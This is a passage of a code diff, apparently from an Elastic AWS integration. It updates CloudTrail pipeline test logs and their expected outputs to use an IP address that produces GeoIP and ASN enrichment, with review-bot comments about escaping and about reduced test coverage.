PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", "provider": "sts.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", 
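Review bot: The new AS organization name is written `"Andrews \u0026 Arnold Ltd"` with the ampersand escaped rather than literal; this is valid JSON and identical after parsing, so it only matters if the expected file were ever compared as text rather than as parsed documents. If the file is regenerated by a tool that escapes `&` this way, leaving it is fine; if it is hand-maintained, `"Andrews & Arnold Ltd"` reads better and matches how the other string values in the same hunk are written. The removed `"country_iso_code": "CN"` after the `location` block reappears as `"country_iso_code": "GB"` between `city_name` and `country_name`, a pure key reordering that should not affect a parsed comparison.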
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log
index 14fb436a938..315e72e609e 100644
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log
+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log
@@ -1,3 +1,3 @@
-{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JohnDoe","accountId":"111122223333","userName":"JohnDoe"},"eventTime":"2014-07-16T15:49:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.110","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","requestParameters":null,"responseElements":{"ConsoleLogin":"Success"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/s3/","MFAUsed":"No"},"eventID":"3fcfb182-98f8-4744-bd45-10aEXAMPLE"}
-{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JaneDoe","accountId":"111122223333","userName":"JaneDoe"},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.100","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"}
-{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName","arn":"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName","accountId":"123456789012","accessKeyId":"AKIAIOSFODNN7EXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"20131102T010628Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIDPPEZS35WEXAMPLE","arn":"arn:aws:iam::123456789012:role/RoleToBeAssumed","accountId":"123456789012","userName":"RoleToBeAssumed"}}},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.100","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"}
+{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JohnDoe","accountId":"111122223333","userName":"JohnDoe"},"eventTime":"2014-07-16T15:49:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","requestParameters":null,"responseElements":{"ConsoleLogin":"Success"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/s3/","MFAUsed":"No"},"eventID":"3fcfb182-98f8-4744-bd45-10aEXAMPLE"}
+{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JaneDoe","accountId":"111122223333","userName":"JaneDoe"},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"}
+{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName","arn":"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName","accountId":"123456789012","accessKeyId":"AKIAIOSFODNN7EXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"20131102T010628Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIDPPEZS35WEXAMPLE","arn":"arn:aws:iam::123456789012:role/RoleToBeAssumed","accountId":"123456789012","userName":"RoleToBeAssumed"}}},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"}
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json
index f9ad591fd4f..69fec10edc1 100644
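Review bot: All three records now carry the same `"sourceIPAddress":"89.160.20.156"`, where the old fixture used two distinct RFC 5737 documentation addresses (`192.0.2.110` and `192.0.2.100`) that produced no geo match, so the corresponding expected-file hunks (`@@ -2,8 +2,26 @@`, `@@ -86,8 +104,26 @@`, `@@ -181,11 +217,29 @@`) repeat one identical `source.geo`/`source.as` block three times and the former no-match output shape (only `source.address` and `source.ip`) is no longer exercised by this file. A pipeline regression that attached one event's enrichment to another would now go unnoticed, which the previous two-address fixture would have caught. Consider keeping one record on a non-enrichable address, or using a second address from the supported set for the two failure records, e.g. `81.2.69.144` as the assume-role fixture in this same commit does, so that per-event enrichment stays distinguishable while the test still resolves against the bundled database.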
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json @@ -2,8 +2,26 @@ "expected": [ { "source": { - "address": "192.0.2.110", - "ip": "192.0.2.110" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" 
@@ -24,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.110\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", 
@@ -86,8 +104,26 @@ }, { "source": { - "address": "192.0.2.100", - "ip": "192.0.2.100" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" 
@@ -108,7 +144,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.100\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", 
@@ -181,11 +217,29 @@ "version": "1.12.0" }, "source": { - "address": "192.0.2.100", - "ip": "192.0.2.100" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"20131102T010628Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:role/RoleToBeAssumed\",\"accountId\":\"123456789012\",\"userName\":\"RoleToBeAssumed\"}}},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.100\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", + "original": 
"{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"20131102T010628Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:role/RoleToBeAssumed\",\"accountId\":\"123456789012\",\"userName\":\"RoleToBeAssumed\"}}},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log index 5b9c40ad40c..81f2d010716 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log 
@@ -1 +1 @@
-{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"72.21.198.64","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}}
+{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}}
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json
index 034cad20c83..00bd7e5645d 100644
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json
+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json 
@@ -3,25 +3,25 @@
 {
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Virginia",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 16509,
+ "number": 29518,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Bredband2 AB"
 }
 },
- "address": "72.21.198.64",
- "ip": "72.21.198.64"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "tags": [
 "preserve_original_event" 
@@ -42,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"72.21.198.64\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", + "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", "provider": "ec2.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", 
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log
index 913b109d7c0..ab5c34153a6 100644
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log
+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log 
@@ -1 +1 @@ -{"eventVersion":"1.04","userIdentity":{"type":"AssumedRole","principalId":"AIDAQRSTUVWXYZEXAMPLE:devdsk","arn":"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk","accountId":"777788889999","accessKeyId":"AKIAQRSTUVWXYZEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2016-11-14T17:25:26Z"},"sessionIssuer":{"type":"Role","principalId":"AIDAQRSTUVWXYZEXAMPLE","arn":"arn:aws:iam::777788889999:role/AssumeNothing","accountId":"777788889999","userName":"AssumeNothing"}}},"eventTime":"2016-11-14T17:25:45Z","eventSource":"s3.amazonaws.com","eventName":"DeleteBucket","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.1","userAgent":"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]","requestParameters":{"bucketName":"my-test-bucket-cross-account"},"responseElements":null,"requestID":"EXAMPLE463D56D4C","eventID":"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE","eventType":"AwsApiCall","recipientAccountId":"777788889999"} +{"eventVersion":"1.04","userIdentity":{"type":"AssumedRole","principalId":"AIDAQRSTUVWXYZEXAMPLE:devdsk","arn":"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk","accountId":"777788889999","accessKeyId":"AKIAQRSTUVWXYZEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2016-11-14T17:25:26Z"},"sessionIssuer":{"type":"Role","principalId":"AIDAQRSTUVWXYZEXAMPLE","arn":"arn:aws:iam::777788889999:role/AssumeNothing","accountId":"777788889999","userName":"AssumeNothing"}}},"eventTime":"2016-11-14T17:25:45Z","eventSource":"s3.amazonaws.com","eventName":"DeleteBucket","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 
botocore/1.4.67]","requestParameters":{"bucketName":"my-test-bucket-cross-account"},"responseElements":null,"requestID":"EXAMPLE463D56D4C","eventID":"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE","eventType":"AwsApiCall","recipientAccountId":"777788889999"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json index 3a5afdbd8ff..4ed161acea7 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json 
@@ -12,11 +12,29 @@ "version": "1.12.0" }, "source": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE:devdsk\",\"arn\":\"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk\",\"accountId\":\"777788889999\",\"accessKeyId\":\"AKIAQRSTUVWXYZEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2016-11-14T17:25:26Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE\",\"arn\":\"arn:aws:iam::777788889999:role/AssumeNothing\",\"accountId\":\"777788889999\",\"userName\":\"AssumeNothing\"}}},\"eventTime\":\"2016-11-14T17:25:45Z\",\"eventSource\":\"s3.amazonaws.com\",\"eventName\":\"DeleteBucket\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.1\",\"userAgent\":\"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]\",\"requestParameters\":{\"bucketName\":\"my-test-bucket-cross-account\"},\"responseElements\":null,\"requestID\":\"EXAMPLE463D56D4C\",\"eventID\":\"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"777788889999\"}", + "original": 
"{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE:devdsk\",\"arn\":\"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk\",\"accountId\":\"777788889999\",\"accessKeyId\":\"AKIAQRSTUVWXYZEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2016-11-14T17:25:26Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE\",\"arn\":\"arn:aws:iam::777788889999:role/AssumeNothing\",\"accountId\":\"777788889999\",\"userName\":\"AssumeNothing\"}}},\"eventTime\":\"2016-11-14T17:25:45Z\",\"eventSource\":\"s3.amazonaws.com\",\"eventName\":\"DeleteBucket\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 